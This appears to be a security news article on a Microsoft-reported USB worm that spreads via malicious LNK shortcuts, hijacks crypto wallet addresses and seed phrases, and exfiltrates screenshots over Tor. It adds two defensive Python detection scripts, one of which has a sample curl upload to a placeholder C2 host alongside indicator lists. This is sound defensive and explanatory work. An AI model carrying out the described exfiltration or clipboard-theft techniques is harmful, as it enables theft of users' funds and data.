“Every half a second, the malware checks the clipboard.” That cadence, Microsoft says, is literal — and it underpins a USB-spread campaign that replaces cryptocurrency wallet addresses, harvests seed phrases and private keys, captures rapid screenshots, and uses the Tor network to hide its command-and-control traffic. The campaign has been active since at least February and pivots on a familiar vector: LNK (Windows shortcut) files on removable drives.
Infection and worm propagation
According to Microsoft, the infection chain begins when a victim opens a malicious LNK file on a USB drive. Additional payloads are staged from a .ONION address. After initial execution, the malware performs a local scan for document files, hides the originals, and replaces them with malicious shortcuts that bear the same names — so attempting to open what looks like a normal document re‑triggers the malware.
The malware also establishes persistence and spread by creating a scheduled task that watches for newly connected USB storage devices. When a removable drive is attached, the worm copies itself to the device and drops more malicious shortcut files, propagating to other machines that subsequently open the infected shortcuts.
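A triage check for the document-swap trick described above, added here as an example (it is not Microsoft's tooling or anything from the report). Windows Explorer never displays the ".lnk" extension, so a shortcut named "report.docx.lnk" beside a hidden "report.docx" looks like the original document; the function below scans a directory listing for exactly that pairing. The matching rules are an assumption of this example: a shortcut is paired with a hidden file when the shortcut name minus ".lnk" equals the hidden file's name, or when both share the same stem (for example "budget.lnk" beside a hidden "budget.xlsx"). The pure function works on an in-memory listing so it can be checked offline; scan_directory() is a thin wrapper over a real path such as the root of a USB drive.

```python
"""Find .lnk shortcuts sitting beside a hidden file of the same name.

Added example, not Microsoft's tooling. Hidden detection uses the Windows
FILE_ATTRIBUTE_HIDDEN bit where available and falls back to dot-files on POSIX.
"""
import os

FILE_ATTRIBUTE_HIDDEN = 0x2  # Windows attribute bit


def find_shortcut_decoys(listing: dict[str, bool]) -> list[tuple[str, str]]:
    """listing maps file name -> is_hidden. Returns sorted (shortcut, hidden_original) pairs."""
    hidden = {name for name, is_hidden in listing.items() if is_hidden}
    hidden_by_stem: dict[str, list[str]] = {}
    for name in hidden:
        hidden_by_stem.setdefault(name.rsplit(".", 1)[0].lower(), []).append(name)

    pairs = []
    for name in listing:
        if not name.lower().endswith(".lnk"):
            continue
        base = name[:-4]                       # "report.docx.lnk" -> "report.docx"
        if base in hidden:                     # exact name match, extension kept
            pairs.append((name, base))
            continue
        stem = base.rsplit(".", 1)[0].lower()  # "budget.lnk" -> "budget"
        for original in hidden_by_stem.get(stem, []):
            pairs.append((name, original))     # same stem, different extension
    return sorted(pairs)


def _is_hidden(entry: os.DirEntry) -> bool:
    st = entry.stat(follow_symlinks=False)
    attrs = getattr(st, "st_file_attributes", 0)  # attribute only exists on Windows
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN) or entry.name.startswith(".")


def scan_directory(path: str) -> list[tuple[str, str]]:
    """Read a real directory (e.g. the root of a removable drive) and run the check."""
    with os.scandir(path) as it:
        listing = {e.name: _is_hidden(e) for e in it if e.is_file(follow_symlinks=False)}
    return find_shortcut_decoys(listing)


if __name__ == "__main__":
    # Constructed listing standing in for a drive root; not from a real infection.
    sample = {
        "report.docx": True, "report.docx.lnk": False,   # original hidden, shortcut visible
        "budget.xlsx": True, "budget.lnk": False,        # same stem, extension dropped
        "notes.txt": False, "readme.lnk": False,         # ordinary file, ordinary shortcut
    }
    for shortcut, original in find_shortcut_decoys(sample):
        print(f"suspect shortcut {shortcut!r} shadows hidden {original!r}")
```

Any hit is worth a closer look, but it is not proof on its own: a legitimate shortcut can coexist with a hidden file of the same name, so treat the output as a triage list and confirm the shortcut's target before drawing conclusions.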
Data stealer behavior
Microsoft describes a stealer component that activates after confirming Task Manager is inactive and then establishes communications with the command-and-control (C2) host using a Tor executable named ugate.exe. The clipboard-monitoring routine runs on a half-second loop, checking for a focused set of crypto-related secrets:
- 12-word BIP39 seed phrases
- 24-word BIP39 seed phrases
- Ethereum private keys
- Bitcoin WIF keys
- Bitcoin legacy, P2SH, Bech32, and Taproot wallet addresses
- Tron wallet addresses
- Monero wallet addresses
When replacing clipboard contents, the attackers choose substitute addresses that begin with the same digits or characters so the swapped-in address partially resembles the original and is less likely to be noticed at a quick glance. In addition to clipboard theft, the malware captures five screenshots every ten seconds and exfiltrates them to the C2 using the curl tool.
Microsoft also reports support for remote code execution: a C2 EVAL instruction causes the malware to download JavaScript into a file named “cfile” and execute it on the infected host.
Tor proxy use and exfiltration
The campaign uses Tor both to pull additional payloads (from a .ONION address) and to conceal communications with the C2 via a Tor executable. Microsoft highlights connections to localhost:9050 and other Tor proxy activity as characteristic network artifacts of this operation. The combination of staged .ONION payloads, ugate.exe, and curl-based exfiltration is a consistent element in the observed infections.
Indicators and detection Microsoft recommends
Microsoft emphasizes that the strongest indicators of compromise are behavioral rather than signature-based. They recommend monitoring for process activity on wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, and unusual child-process patterns. Network teams should also treat connections to localhost:9050 and other Tor proxy traffic as red flags tied to this campaign.
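To make that guidance concrete, here is a behaviour-based triage model added as an example; it is not Microsoft's detection content. It scores constructed, Sysmon-style records (event_id 1 for process creation, 3 for network connections) against the artifacts named above: script-host activity, script hosts spawning curl, PowerShell or cmd.exe, a script host creating a scheduled task, a process named ugate.exe, and connections to localhost:9050. The finding names, weights and alert threshold are this example's own choices and should be tuned to your environment; the sample events are constructed and the C2 destination is a placeholder.

```python
"""Score host events for the behavioural artifacts described in the report.

Added example, not Microsoft's detection logic. Process names, ugate.exe and the
localhost:9050 Tor SOCKS artifact come from the report; weights are assumed.
"""
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPECT_CHILDREN = {"curl.exe", "powershell.exe", "cmd.exe"}
TOR_BINARY = "ugate.exe"        # Tor executable name reported for this campaign
TOR_SOCKS_PORT = 9050           # localhost:9050 = Tor SOCKS proxy artifact
LOOPBACK = {"127.0.0.1", "::1"}

WEIGHTS = {                     # assumed scoring; tune to your environment
    "script-host-start": 1,
    "script-host-spawns-child": 3,
    "script-host-creates-task": 3,
    "tor-binary-ugate": 5,
    "tor-socks-connect": 4,
}
ALERT_THRESHOLD = 5


@dataclass
class Event:
    """Minimal Sysmon-like record: 1 = process create, 3 = network connect."""
    event_id: int
    image: str
    parent_image: str = ""
    command_line: str = ""
    dest_ip: str = ""
    dest_port: int = 0


def _name(path: str) -> str:
    """Basename, lower-cased, tolerant of either path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> list[str]:
    """Findings for one event; an empty list means nothing in this model fired."""
    findings = []
    img, parent = _name(ev.image), _name(ev.parent_image)
    if ev.event_id == 1:
        if img == TOR_BINARY:
            findings.append("tor-binary-ugate")
        if img in SCRIPT_HOSTS:
            findings.append("script-host-start")
        if parent in SCRIPT_HOSTS and img in SUSPECT_CHILDREN:
            findings.append("script-host-spawns-child")
        if parent in SCRIPT_HOSTS and img == "schtasks.exe" and "/create" in ev.command_line.lower():
            findings.append("script-host-creates-task")
    elif ev.event_id == 3:
        if ev.dest_ip in LOOPBACK and ev.dest_port == TOR_SOCKS_PORT:
            findings.append("tor-socks-connect")
    return findings


def triage(events: list[Event]) -> tuple[int, list[str]]:
    """Score one host's events; returns (total score, sorted distinct findings)."""
    seen: set[str] = set()
    total = 0
    for ev in events:
        for finding in classify(ev):
            total += WEIGHTS[finding]
            seen.add(finding)
    return total, sorted(seen)


def is_suspicious(events: list[Event]) -> bool:
    return triage(events)[0] >= ALERT_THRESHOLD


SAMPLE_EVENTS = [  # constructed, not captured from a real infection
    Event(1, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe", r'wscript.exe "E:\report.js"'),
    Event(1, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\wscript.exe", "schtasks /create /tn Updater ..."),
    Event(1, r"C:\Users\alice\AppData\Roaming\ugate.exe", r"C:\Windows\System32\wscript.exe"),
    Event(1, r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\wscript.exe", "curl.exe -T shot.png [c2-placeholder]"),
    Event(3, r"C:\Windows\System32\curl.exe", dest_ip="127.0.0.1", dest_port=9050),
    Event(1, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe"),  # benign control
]

if __name__ == "__main__":
    score, findings = triage(SAMPLE_EVENTS)
    print(f"score={score} suspicious={is_suspicious(SAMPLE_EVENTS)} findings={findings}")
```

A single wscript.exe start scores low on purpose, since logon scripts and admin tooling use it legitimately; it is the chain (script host, then a spawned curl or scheduled task, then the Tor artifacts) that pushes a host over the threshold, which is the point Microsoft makes about behavioral rather than signature-based indicators.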
Complementing that operational guidance, a cited Picus whitepaper notes that “Security teams log 54% of successful attacks and alert on just 14%,” highlighting detection and alerting gaps that allow threats to move through environments unseen unless behavior-focused rules and monitoring are in place.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams will be watching for the behavioral signatures Microsoft names: repeated clipboard checks, rapid screenshot activity sent by curl, unexpected use of ugate.exe and Tor proxy connections, and scheduled tasks that monitor USB events.
- Procurement and enterprise IT leaders will need to account for removable media as an active worm vector because the malware copies itself onto connected USB drives and replaces documents with malicious LNK files.
- End users and custodians of crypto wallets will be keenly exposed: the malware targets seed phrases, private keys, and multiple wallet address formats and purposefully substitutes addresses that resemble originals to evade casual detection.
This campaign combines low‑tech propagation — malicious shortcuts on USB drives — with focused, high-value theft: half‑second clipboard surveillance of seed phrases and keys, screenshot capture, and Tor-protected exfiltration. Microsoft’s guidance centers on behavioral detection: watch the processes, watch for curl and Tor proxy traffic, and watch for scheduled tasks that reproduce the infection across removable media. The record here is specific; the response must be too.